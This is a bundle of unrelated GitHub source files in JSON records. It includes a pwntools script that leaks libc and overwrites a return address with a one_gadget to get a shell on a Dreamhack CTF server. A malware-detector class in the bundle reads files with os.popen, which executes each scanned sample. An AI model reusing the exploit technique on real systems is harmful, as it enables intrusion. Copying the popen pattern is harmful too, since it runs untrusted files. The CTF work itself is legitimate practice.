[MobileCharger(copy.deepcopy(net.baseStation.location), mc_phy_spe=mc_argc) for _ in range(3)]\n\nfor id, mc in enumerate(mcs):\n mc.env = env\n mc.net = net\n mc.id = id\n mc.log = [net.baseStation.location[0], net.baseStation.location[1], 0]\nmc0_process = env.process(mcs[0].operate_step([0.7 * (net.frame[1] - net.frame[0]) + net.frame[0], 0.8 * (net.frame[3] - net.frame[2]) + net.frame[2], 75]))\nmc1_process = env.process(mcs[1].operate_step([0.7 * (net.frame[1] - net.frame[0]) + net.frame[0], 0.8 * (net.frame[3] - net.frame[2]) + net.frame[2], 50])) \nmc2_process = env.process(mcs[2].operate_step([0.35 * (net.frame[1] - net.frame[0]) + net.frame[0], 0.6 * (net.frame[3] - net.frame[2]) + net.frame[2], 100])) \nnet_process = env.process(net.operate())\n\ngeneral_process = mc0_process | mc1_process | mc2_process | net_process\n\nenv.process(log(net, mcs))\nenv.run(until = net_process)\n#env.run(until = general_process)","repo_name":"nguyenngocbaocmt02/multi_agent_rl_wrsn","sub_path":"runner/test_mc.py","file_name":"test_mc.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"18842568455","text":"import subprocess\nfrom itertools import chain\n\n\nhandlers = {}\n\nclass FormatHandler:\n\tdef __init_subclass__(cls):\n\t\tfor ext in cls.extensions:\n\t\t\thandlers[ext] = cls()\n\nclass Vorbis(FormatHandler):\n\textensions = ('flac','opus')\n\n\ttagnames = {\n\t\t# https://xiph.org/vorbis/doc/v-comment.html\n\t\t\"title\":\"TITLE\",\n\t\t\"artist\":\"ARTIST\",\n\t\t\"albumartist\":\"ALBUMARTIST\",\n\t\t\"album\":\"ALBUM\",\n\t\t\"genre\":\"GENRE\",\n\t\t\"date\":\"DATE\",\n\t\t\"tracknumber\":\"TRACKNUMBER\"\n\t}\n\n\tdef tag(self,file,tags,data):\n\n\t\tsubprocess.call([\"metaflac\"] + [f\"--remove-tag={key}\" for key in tags] + [file])\n\t\tsubprocess.call([\"metaflac\",file] + [f\"--set-tag={self.tagnames[key]}={value}\" for key,value in tags.items()])\n\t\tif data['remove_artwork']:\n\t\t\tsubprocess.call([\"metaflac\",\"--remove\",\"--block-type=PICTURE\",file])\n\n\nclass ID3(FormatHandler):\n\textensions = ('mp3',)\n\n\ttagnames = {\n\t\t# https://id3.org/id3v2.3.0#Text_information_frames\n\t\t\"title\":\"TIT2\",\n\t\t\"artist\":\"TPE1\",\n\t\t\"albumartist\":\"TPE2\", # not to specs, but commonly used,\n\t\t\"album\":\"TALB\",\n\t\t\"genre\":\"TCON\", # :/\n\t\t\"date\":\"TYER\",\n\t\t\"tracknumber\":\"TRCK\"\n\t}\n\n\tdef tag(self,file,tags,data):\n\t\tsubprocess.call([\"id3v2\"] + list(chain(*[[f\"--{self.tagnames[key]}\",str(value)] for key,value in tags.items()])) + [file])\n","repo_name":"krateng/mumema","sub_path":"mumema/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70883262492","text":"import sys\nfrom optparse import make_option\nfrom snf_django.lib.api import Credentials\nfrom django.core.management.base import CommandError\nfrom snf_django.management.commands import SynnefoCommand\nfrom synnefo.management.common import get_resource\nfrom synnefo.api.util import (COMPUTE_API_TAG_NAMESPACES as tag_namespaces,\n make_tag)\nfrom synnefo.logic import servers\n\n\nclass Command(SynnefoCommand):\n args = \" \"\n help = \"Check whether a server tag exists\"\n\n def handle(self, *args, **options):\n if len(args) != 2:\n raise CommandError(\"Please provide a server ID and a tag\")\n\n credentials = Credentials(\"snf-manage\", is_admin=True)\n server_id = args[0]\n server = get_resource(\"server\", server_id)\n\n tag = args[1]\n header = ['tag', 'status', 'namespace']\n table = []\n\n for namespace in tag_namespaces:\n tag_db = make_tag(tag, namespace)\n db_tag = servers.check_tag_exists(server_id, credentials, tag_db)\n if db_tag:\n table.append([tag.encode('utf-8'), db_tag.status, namespace])\n\n if table:\n self.pprint_table(table, header, options[\"output_format\"])\n","repo_name":"grnet/synnefo","sub_path":"snf-cyclades-app/synnefo/logic/management/commands/server-tag-exists.py","file_name":"server-tag-exists.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"31449444358","text":"#! /home/users/cordier/.linuxbrew/bin/python3\n\n#\n# Note: This Script Has Only Been Validated on FastQ\n#\n\ndef chunks (iterator, size):\n \"\"\"\n Split File into Chunks for Processing - Not Yet Implemented\n \"\"\"\n reads = True\n while reads:\n reads = []\n while len(chunk) < size:\n try:\n reads = iterator.next()\n except StopIteration:\n reads = None\n if reads is None:\n break\n chunk.append(reads)\n if chunk:\n yield chunk\n\nif __name__ == \"__main__\":\n\n # Imports\n import sys, argparse\n # Library Import\n from Bio import SeqIO\n from Bio.SeqIO.QualityIO import PairedFastaQualIterator\n\n # Accepted Formats\n acceptedFormats = [\"fasta\", \"fastq\", \"qual\", \"fa\", \"fq\", \"sam\"]\n\n # \n # Parse Arguments\n # \n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", type = str, help = \"Input File\")\n parser.add_argument(\"-p\", \"--prefix\", type = str, help = \"Output Prefix for Warnings CSV\")\n parser.add_argument(\"-f\", \"--format\", type = str, help = \"Format of Input File (overrides automatic detection)\")\n parser.add_argument(\"--paired\", action = \"store_true\", help = \"Interleaved Paired-End Reads File\")\n parser.add_argument(\"--strict\", action = \"store_true\", help = \"Evaluate complete file - i.e. don't output first error & exit\")\n parser.add_argument(\"--allow_orphan_reads\", action = \"store_true\", help = \"Allow For Orphan Reads\")\n argsDict = vars(parser.parse_args())\n\n # Set Arguments\n inputfile = argsDict[\"input\"]\n format = argsDict[\"format\"]\n prefix = argsDict[\"prefix\"]\n paired = argsDict[\"paired\"]\n strict = argsDict[\"strict\"]\n orphans = argsDict[\"allow_orphan_reads\"]\n\n # Detect Format\n if format is None:\n format = (inputfile.split(\".\")[-1]).lower()\n\n # Get Prefix\n if prefix is None:\n prefix = inputfile.replace(\".\" + format, \"\").split(\"/\")[-1]\n\n # Assertions for Required Input\n assert (inputfile is not None), \"No input file provided!\"\n assert (format in acceptedFormats), \"Invalid format: %s!\" % format\n\n #\n # Validation\n #\n\n if not strict:\n warnings = {\n \"unpaired_reads\" : [],\n \"qual_seq_len_mismatch\" : [],\n \"id_mismatch\" : {\n \"missing_1\" : [],\n \"missing_2\" : []\n }\n }\n if paired:\n\n # Not Strict, Paired, No Orphans\n print(\"\\nValidating That Sequences are Correctly Interleaved and That Sequence & Quality Scores Are of The Same Length\")\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n resetReadframe = False\n count = 0\n for record in records:\n seqA = record\n seqB = next(records)\n count += 2\n # Are Reads Paired-End?\n if (seqA.id[-2:] != \"/1\") and (seqA.id[-2:] != \"/2\"):\n warnings[\"unpaired_reads\"].append(seqA.id)\n if (seqB.id[-2:] != \"/1\") and (seqB.id[-2:] != \"/2\"):\n warnings[\"unpaired_reads\"].append(seqB.id)\n # Are Sequence Lengths & Quality Lengths the Same?\n if (len(seqA.seq) != len(seqA.letter_annotations[\"phred_quality\"])):\n warnings[\"qual_seq_len_mismatch\"].append(seqA.id)\n if (len(seqB.seq) != len(seqB.letter_annotations[\"phred_quality\"])):\n warnings[\"qual_seq_len_mismatch\"].append(seqB.id)\n # Are Paired IDs The Same?\n if seqA.id[0:-2] != seqB.id[0:-2]:\n # Is Read /1 In Fact the Read /1? If Not, 1 is in Fact 2 & Missing it's /1 Pair\n if (seqA.id[-2:] != \"/1\"):\n warnings[\"id_mismatch\"][\"missing_1\"].append(seqA.id)\n # Is Read /2 In Fact the Read /2? If Not, 2 is in Fact next 1, & 1 is Missing it's /2 Pair\n if (seqB.id[-2:] != \"/2\"):\n warnings[\"id_mismatch\"][\"missing_2\"].append(seqA.id)\n\n # Write Warnings\n with open(\"validation_warnings.%s.tsv\" % prefix, \"w\") as warningfile:\n warningfile.write(\"id\\twarning\\n\")\n for seqID in warnings[\"unpaired_reads\"]:\n warningfile.write(\"%s\\tunpaired_reads\\n\" % seqID)\n for seqID in warnings[\"qual_seq_len_mismatch\"]:\n warningfile.write(\"%s\\tqual_seq_len_mismatch\\n\" % seqID)\n for seqID in warnings[\"id_mismatch\"][\"missing_1\"]:\n warningfile.write(\"%s\\tid_mismatch_missing_1\\n\" % seqID)\n for seqID in warnings[\"id_mismatch\"][\"missing_2\"]:\n warningfile.write(\"%s\\tid_mismatch_missing_2\\n\" % seqID)\n\n # Print Results\n print(\"\\nParsed %d Paired End Reads and Found:\" % count)\n print(\" %d Unpaired Read(s)\" % len(warnings[\"unpaired_reads\"]))\n print(\" %d Read(s) Are Missing Their /1 Mate\" % len(warnings[\"id_mismatch\"][\"missing_1\"]))\n print(\" %d Read(s) Are Missing Their /2 Mate\" % len(warnings[\"id_mismatch\"][\"missing_2\"]))\n print(\" %d Read(s) With a Sequence / Quality String Length Mismatch\" % len(warnings[\"qual_seq_len_mismatch\"]))\n print(\"\\nWarnings Written to: validation_warnings.%s.tsv\" % prefix)\n\n else:\n\n # Not Strict, Single\n print(\"\\nValidating That Single-End Sequence & Quality Scores Are of The Same Length\")\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n count = 0\n for record in records:\n # Are Sequence Lengths & Quality Lengths the Same?\n assert (len(record.seq) == len(record.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % record.id\n count += 1\n\n # Write Warnings\n with open(\"validation_warnings.%s.tsv\" % prefix, \"w\") as warningfile:\n warningfile.write(\"id\\twarning\\n\")\n for seqID in warnings[\"qual_seq_len_mismatch\"]:\n warningfile.write(\"%s\\tqual_seq_len_mismatch\\n\" % seqID)\n \n # Print Results\n print(\"\\nParsed %d Single End Reads and Found:\" % count)\n print(\"\\t%d Read(s) With a Sequence / Quality String Length Mismatch\" % len(warnings[\"qual_seq_len_mismatch\"]))\n print(\"\\nWarnings Written to: validation_warnings.%s.tsv\" % prefix)\n\n else:\n \n # Strict, Paired, No Orphans\n if paired:\n\n print(\"\\nValidating That Sequences are Correctly Interleaved and That Sequence & Quality Scores Are of The Same Length\")\n if orphans:\n\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n for record in records:\n seqA = record\n seqB = next(records)\n # Are Reads Paired-End?\n assert (seqA.id[-2:] == \"/1\") or (seqA.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % seqA.id\n assert (seqB.id[-2:] == \"/1\") or (seqB.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % seqB.id\n # Are Sequence Lengths & Quality Lengths the Same?\n assert (len(seqA.seq) == len(seqA.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqA.id\n assert (len(seqB.seq) == len(seqB.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqB.id\n \n else:\n\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n for record in records:\n seqA = record\n seqB = next(records)\n # Are Reads Paired-End?\n assert (seqA.id[-2:] == \"/1\") or (seqA.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % seqA.id\n assert (seqB.id[-2:] == \"/1\") or (seqB.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % seqB.id\n # Are Paired IDs The Same?\n if seqA.id[0:-2] != seqB.id[0:-2]:\n # Is Read /1 In Fact the Read /1? If Not, 1 is in Fact 2 & Missing it's /1 Pair\n assert (seqA.id[-2:] == \"/1\"), \"Orphan Read Found (Missing /1 of Pair): %s\" % seqA.id\n # Is Read /2 In Fact the Read /2? If Not, 2 is in Fact next 1, & 1 is Missing it's /2 Pair\n assert (seqB.id[-2:] == \"/2\"), \"Orphan Read Found (Missing /2 of Pair): %s\" % seqA.id\n # Are Sequence Lengths & Quality Lengths the Same?\n assert (len(seqA.seq) == len(seqA.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqA.id\n assert (len(seqB.seq) == len(seqB.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqB.id\n \n else:\n\n # Strict, Single\n print(\"\\nValidating That Single-End Sequence & Quality Scores Are of The Same Length\")\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n for record in records:\n # Are Sequence Lengths & Quality Lengths the Same?\n assert (len(record.seq) == len(record.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % record.id\n\n print(\"\\nDone\")\n\nelse:\n\n pass\n","repo_name":"greenstick/gatk-pipeliner","sub_path":"utils/validate-fastq.py","file_name":"validate-fastq.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28322018167","text":"# Created by Bob at 2023/09/07 15:02\n# leetgo: dev\n# https://leetcode.com/problems/maximum-subarray/\n\nfrom typing import *\nfrom leetgo_py import *\n\n# @lc code=begin\n\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n maxSum = int(-10e4)\n prevSum = 0\n\n for num in nums:\n if prevSum + num > num:\n prevSum += num\n else:\n prevSum = num\n\n if prevSum > maxSum:\n maxSum = prevSum\n\n return maxSum\n\n\n# @lc code=end\n\nif __name__ == \"__main__\":\n nums: List[int] = deserialize(\"List[int]\", read_line())\n ans = Solution().maxSubArray(nums)\n\n print(\"\\noutput:\", serialize(ans))\n","repo_name":"princebillygk/dsa-and-leetcode","sub_path":"python3/0053.maximum-subarray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30134644894","text":"import os\nimport sys\nimport pickle\nimport re\nimport numpy\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction import FeatureHasher\n\nclass MachineLearningDetection():\n\n def __init__(self) -> None:\n self\n\n def get_string_features(self, path,hasher):\n # extract strings from binary file using regular expressions\n chars = r\" -~\"\n min_length = 5\n string_regexp = '[%s]{%d,}' % (chars, min_length)\n data = os.popen(f\"{path}\").read()\n #data = file_object.read()\n pattern = re.compile(string_regexp)\n strings = pattern.findall(data)\n string_features = {}\n for string in strings:\n string_features[string] = 1\n\n # hash the features using the hashing trick\n hashed_features = hasher.transform([string_features])\n\n # do some data munging to get the feature array\n hashed_features = hashed_features.todense()\n hashed_features = numpy.asarray(hashed_features)\n hashed_features = hashed_features[0]\n\n # return hashed string features\n print (\"Extracted {0} strings from {1}\".format(len(string_features),path))\n return hashed_features\n\n def scan_file(self, path):\n # scan a file to determine if it is malicious or benign\n if not os.path.exists(\"saved_detector.pkl\"):\n print (\"It appears you haven't trained a detector yet! Do this before scanning files.\")\n sys.exit(1)\n with open(\"saved_detector.pkl\") as saved_detector:\n classifier, hasher = pickle.load(saved_detector)\n features = self.get_string_features(path,hasher)\n result_proba = classifier.predict_proba([features])[:,1]\n # if the user specifies malware_paths and benignware_paths, train a detector\n if result_proba > 0.5:\n print (f\"It appears this file is malicious!{result_proba}\")\n else:\n print (f\"It appears this file is benign{result_proba}\")\n\n def train_detector(self, benign_path,malicious_path,hasher):\n # train the detector on the specified training data\n def get_training_paths(directory):\n targets = []\n for path in os.listdir(directory):\n targets.append(os.path.join(directory,path))\n return targets\n malicious_paths = get_training_paths(malicious_path)\n benign_paths = get_training_paths(benign_path)\n X = [self.get_string_features(path,hasher) for path in malicious_paths + benign_paths]\n y = [1 for i in range(len(malicious_paths))] + [0 for i in range(len(benign_paths))]\n classifier = RandomForestClassifier(64)\n classifier.fit(X,y)\n pickle.dump((classifier,hasher),open(\"saved_detector.pkl\",\"w+\"))\n\n def cv_evaluate(self, X,y,hasher):\n # use cross-validation to evaluate our model\n import random\n from sklearn import metrics\n from matplotlib import pyplot\n from sklearn.model_selection import KFold\n X, y = numpy.array(X), numpy.array(y)\n fold_counter = 0\n for train, test in KFold(len(X),2,shuffle=True):\n training_X, training_y = X[train], y[train]\n test_X, test_y = X[test], y[test]\n classifier = RandomForestClassifier(64)\n classifier.fit(training_X,training_y)\n scores = classifier.predict_proba(test_X)[:,-1]\n fpr, tpr, thresholds = metrics.roc_curve(test_y, scores)\n #pyplot.semilogx(fpr,tpr,label=\"Fold number {0}\".format(fold_counter))\n pyplot.semilogx(fpr,tpr,label=\"ROC curve\".format(fold_counter))\n fold_counter += 1\n break\n pyplot.xlabel(\"detector false positive rate\")\n pyplot.ylabel(\"detector true positive rate\")\n pyplot.title(\"Detector ROC curve\")\n #pyplot.title(\"detector cross-validation ROC curves\")\n pyplot.legend()\n pyplot.grid()\n pyplot.show()\n\n def get_training_data(self, benign_path,malicious_path,hasher):\n def get_training_paths(directory):\n targets = []\n for path in os.listdir(directory):\n targets.append(os.path.join(directory,path))\n return targets\n malicious_paths = get_training_paths(malicious_path)\n benign_paths = get_training_paths(benign_path)\n X = [self.get_string_features(path,hasher) for path in malicious_paths + benign_paths]\n y = [1 for i in range(len(malicious_paths))] + [0 for i in range(len(benign_paths))]\n return X, y\n","repo_name":"aleyhdar/-BSM497","sub_path":"ch7/machine_learning_detection.py","file_name":"machine_learning_detection.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73819469532","text":"def createFile(name):\n try:\n with open(name, 'w', encoding='utf-8') as f:\n f.write('123')\n except FileNotFoundError as e:\n print(e)\n print(e.args)\n print(e.errno)\n name = name.replace('/', '')\n with open(name, 'w', encoding='utf-8') as f:\n f.write('123')\n except OSError as e:\n print(e)\n name = 'test123'\n with open(name, 'w', encoding='utf-8') as f:\n f.write('123')\n except:\n print('Unknown Exception!')\n\ncreateFile('test/test1.txt')\ncreateFile('test?test')","repo_name":"uuboyscy/eb102-python","sub_path":"13_exception1.py","file_name":"13_exception1.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3491429785","text":"from pwn import *\n\n# p = process(\"./oneshot\")\n# nc host1.dreamhack.games 23506\np = remote(\"host1.dreamhack.games\", 23506)\n\nlibc = ELF(\"./libc.so.6\")\n# libc = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\n# one_offset = [0x45226, 0x4527a, 0xf03a4, 0xf1247] # /lib/x86_64-linux-gnu/libc-2.23.so\none_offset = [0x45216, 0x4526a, 0xf02a4, 0xf1147]\n\n# pie_base = p.libs()['/home/leeminjea/Desktop/sf/dreamhack/oneshot/oneshot']\n\np.recvuntil(\"stdout: \")\n\nstdout = int(p.recv(14), 16)\nlibc.address = stdout - libc.symbols[\"_IO_2_1_stdout_\"] #+ pie_base\none_gadget = libc.address + one_offset[0]\n\nlog.info(\"stdout: \" + hex(stdout))\nlog.info(\"libc.address: \" + hex(libc.address))\n\npay = b\"\"\npay += b\"A\" * (0x20 - 0x8)\npay += p64(0)\npay += b\"B\" * 0x8\npay += p64(one_gadget)\n# pay += b\"X\" * 0x8\n\ninput()\n\np.sendafter(\"MSG: \", pay)\n\n\np.interactive()","repo_name":"MinjeaLee/s-_pwn_sf","sub_path":"dreamhack/oneshot/ex_oneshot.py","file_name":"ex_oneshot.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14578391215","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\nwelcome_text = \"Привет! Я - простой бот, чтобы узнать погоду сейчас или прогноз погоды.\\n\" \\\n \"Для этого используйте команду /weather.\\n\" \\\n \"<>\\n\" \\\n \"Hello! I am a simple bot to get weather forecast or current weather.\\n\" \\\n \"To get weather forecast or find out current weather in your location, use the /weather command.\"\nunfinished_registration = \"Пожалуйста, выберите язык\\n\" \\\n \"<>\\n\" \\\n \"Please, set language\"\n\nlang_kb = InlineKeyboardMarkup()\nlang_kb.add(InlineKeyboardButton(\"Русский\", callback_data=\"ru\"))\nlang_kb.add(InlineKeyboardButton(\"English\", callback_data=\"en\"))\n","repo_name":"Dannypa/WeatherBot","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41447450836","text":"def main():\n print(\"Rankings module\")\n\nfrom datetime import timedelta\nimport numpy as np\n\n# Winners win ranking functions:\ndef get_winners_win_dict(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes these matches come ordered by date.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n \"\"\"\n winners_dict = {}\n for match in matches:\n # Check for specific years.\n if year != None:\n # Assumes matches are chronologically ordered.\n # Matches before our year are skipped\n if match[\"start_date\"].date().year < year:\n continue\n # We break the loop after we have finished with the matches of a year.\n elif match[\"start_date\"].date().year > year:\n break\n\n # And now we include the victories of the players.\n if match[\"player_1\"] not in winners_dict:\n winners_dict[match[\"player_1\"]] = 0\n if match[\"player_2\"] not in winners_dict:\n winners_dict[match[\"player_2\"]] = 0\n if match[\"player_1\"] == match[\"winner\"]:\n winners_dict[match[\"player_1\"]] += 1\n else:\n winners_dict[match[\"player_2\"]] += 1\n\n return winners_dict\n\ndef winners_win_ranking(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n Returns a list of lists [[player, number of matches won, ranking]]\n ordered by ranking (which is defined as the reverse of matches won, compared\n between players).\n \"\"\"\n if year != None:\n if year < 2007 or year > 2021:\n raise ValueError(\"There is no data availability before 2007 or after 2021.\")\n\n ranking = 0\n winners_list = []\n winners_dict = get_winners_win_dict(matches, year)\n # Source for using winners_dict.get:\n # https://stackoverflow.com/a/3177911/15459665\n for winner in sorted(winners_dict, key = winners_dict.get, reverse = True):\n ranking += 1\n winners_list.append([winner, winners_dict[winner], ranking])\n\n return winners_list\n\n\n\n# Winners don\"t lose ranking functions:\ndef get_dict_tournaments_rounds(matches):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Returns a dictionary of dictionaries, where we can retrieve the round number\n of a round in a certain tournament.\n\n E.g., {\"US Open\":{2007: {\"First Round\": 1, ..., \"Final\": 5},\n 2008: {\"Third Round\": 3, \"Fourth Round\": 4, ..., \"Final\": 6]}}\n \"\"\"\n tournaments_dict = {}\n n_round = 0\n for match in matches:\n if match[\"tournament\"] in tournaments_dict:\n if match[\"start_date\"] in tournaments_dict[match[\"tournament\"]]:\n if match[\"round\"] in \\\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]]:\n continue\n\n # Tournament in dictionary, but in a different year.\n else:\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]] = {}\n n_round = 0\n\n # New tournament in the dataset. In both cases (new year and new tournament)\n # we reset n_round.\n elif match[\"tournament\"] not in tournaments_dict:\n tournaments_dict[match[\"tournament\"]] = {}\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]] = {}\n n_round = 0\n\n\n # Handle the case of splitted tournaments in the following if-statements:\n if n_round == 0 and match[\"round\"] == \"Second Round\":\n n_round += 2\n\n # Set the final at the same level of the Third Place match if there is one.\n # (Here we are assuming that the matches are chronologically ordered)\n elif (match[\"round\"] == \"Final\"\n and \"Third Place\" in tournaments_dict[match[\"tournament\"]][match[\"start_date\"]]):\n n_round = tournaments_dict[match[\"tournament\"]][match[\"start_date\"]][\"Third Place\"]\n\n # In any other circumstance, the number of rounds increases by one.\n else:\n n_round += 1\n\n\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]][match[\"round\"]] = n_round\n\n return tournaments_dict\n\ndef get_winners_dont_lose_dict(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n \"\"\"\n winners_dict = {}\n tournaments_dict = get_dict_tournaments_rounds(matches)\n for match in matches:\n # Same procedure as in get_winners_win_dict to check for the desired year\n if year != None:\n if match[\"start_date\"].date().year < year:\n continue\n elif match[\"start_date\"].date().year > year:\n break\n\n # Initialize the player in the dict\n if match[\"player_1\"] not in winners_dict:\n winners_dict[match[\"player_1\"]] = 0\n if match[\"player_2\"] not in winners_dict:\n winners_dict[match[\"player_2\"]] = 0\n\n # Retrieve the match round.\n r = tournaments_dict[match[\"tournament\"]][match[\"start_date\"]][match[\"round\"]]\n\n # Add or substract points depending on r\n if match[\"player_1\"] == match[\"winner\"]:\n winners_dict[match[\"player_1\"]] += 1 * r\n winners_dict[match[\"player_2\"]] -= 1 / r\n else:\n winners_dict[match[\"player_1\"]] -= 1 / r\n winners_dict[match[\"player_2\"]] += 1 * r\n\n return winners_dict\n\ndef winners_dont_lose_ranking(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n Returns a list of lists (player, score and ranking)\n ordered by ranking (which is defined as the reverse of score, compared\n between players). The objective of using a list is to preserve order.\n \"\"\"\n if year != None:\n if year < 2007 or year > 2021:\n raise ValueError(\"There is no data availability before 2007 or after 2021.\")\n\n ranking = 0\n winners_list = []\n winners_dict = get_winners_dont_lose_dict(matches, year)\n for winner in sorted(winners_dict, key = winners_dict.get, reverse = True):\n ranking += 1\n winners_list.append([winner, winners_dict[winner], ranking])\n\n return winners_list\n\n\n# Winners beat other winners rankings\ndef get_wbw_dict(matches, year = None, weeks = None, start_date = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary represents\n a match (ordered by date). Assumes year is an integer that shows the year in which the dictionary\n should be calculated; if set to None, it gathers information for all the years.\n Weeks (integer) and start date (datetime) are used to calculate the rankings for\n all matches ended in the previous n weeks to a certain date.\n Year should not be used together with weeks and start_date.\n\n This function returns a dictionary of players, showing the number of times\n they lost \"n_losses\" and a dictionary called \"lost_to\" that represents\n the players to whom they lost and how many times this happened.\n \"\"\"\n if start_date != None and weeks != None and year != None:\n raise ValueError(\"Year parameter cannot be specified together with weeks and start_date.\")\n if weeks != None and weeks <= 0:\n raise ValueError(\"The number of previous weeks to take into account must be positive.\")\n losers_dict = {}\n if start_date != None and weeks != None:\n first_week = start_date - timedelta(weeks = weeks)\n for match in matches:\n # We use the years procedure to trim the matches.\n # Same counting as in get_winners_win_dict\n if weeks == None and start_date == None:\n if year != None:\n if match[\"start_date\"].date().year < year:\n continue\n elif match[\"start_date\"].date().year > year:\n break\n\n # Or the weeks procedure:\n # Since tournaments and matches are ordered,\n # it breaks the loop after surpassing the inputted\n # start date (in other words, includes tournaments ENDED\n # in the interval of the 52 weeks previous to the current start date).\n else:\n if match[\"end_date\"] < first_week:\n continue\n elif match[\"end_date\"] > start_date:\n break\n\n # If the players do not appear in the dictionary yet, we include them.\n if match[\"player_1\"] not in losers_dict:\n losers_dict[match[\"player_1\"]] = {}\n losers_dict[match[\"player_1\"]][\"n_losses\"] = 0\n losers_dict[match[\"player_1\"]][\"lost_to\"] = {}\n if match[\"player_2\"] not in losers_dict:\n losers_dict[match[\"player_2\"]] = {}\n losers_dict[match[\"player_2\"]][\"n_losses\"] = 0\n losers_dict[match[\"player_2\"]][\"lost_to\"] = {}\n\n # The loser adds one loss, and we create a dictionary with the players to\n # whom she has lost and the number of times this has happened.\n if match[\"player_1\"] != match[\"winner\"]:\n losers_dict[match[\"player_1\"]][\"n_losses\"] += 1\n if match[\"player_2\"] not in losers_dict[match[\"player_1\"]][\"lost_to\"]:\n losers_dict[match[\"player_1\"]][\"lost_to\"][match[\"player_2\"]] = 1\n else:\n losers_dict[match[\"player_1\"]][\"lost_to\"][match[\"player_2\"]] += 1\n else:\n losers_dict[match[\"player_2\"]][\"n_losses\"] += 1\n if match[\"player_1\"] not in losers_dict[match[\"player_2\"]][\"lost_to\"]:\n losers_dict[match[\"player_2\"]][\"lost_to\"][match[\"player_1\"]] = 1\n else:\n losers_dict[match[\"player_2\"]][\"lost_to\"][match[\"player_1\"]] += 1\n\n return losers_dict\n\n\ndef wbw_ranking(matches, year = None, weeks = None, start_date = None,\n epsilon = 1e-10, max_iterations = 150):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Year is an integer that shows the year for which the ranking should be calculated.\n Weeks (integer) and start date (datetime) are used to calculate the rankings for\n all matches ended in the previous n weeks to a certain date.\n Year should not be used together with weeks and start_date.\n\n Epsilon is a float used to determine the convergence criterion of the scores\n in the last algorithm. It shows the average deviation from the scores of each player\n between the previous iteration of the wbw score distribution and the current one.\n Hence, if the algorithm takes too much time or does not converge, the user can raise it.\n On the other hand, max_iterations shows the number of maximum iterations that\n the algorithm should run; it works as a stopping rule in case there is no\n convergence.\n\n This algorithm implements the WbW (winners beat other winners) ranking.\n It returns two objects:\n The first one is a list of lists (player, score and ranking)\n ordered by ranking (which is defined as the reverse of score, compared\n between players). The objective of using a list is to preserve order.\n The second one is a dictionary of the players, where the values are a list of\n score-ranking pairs. This is a more efficient data structure for comparison\n purposes, whereas the first one is better suited for easily finding the top n 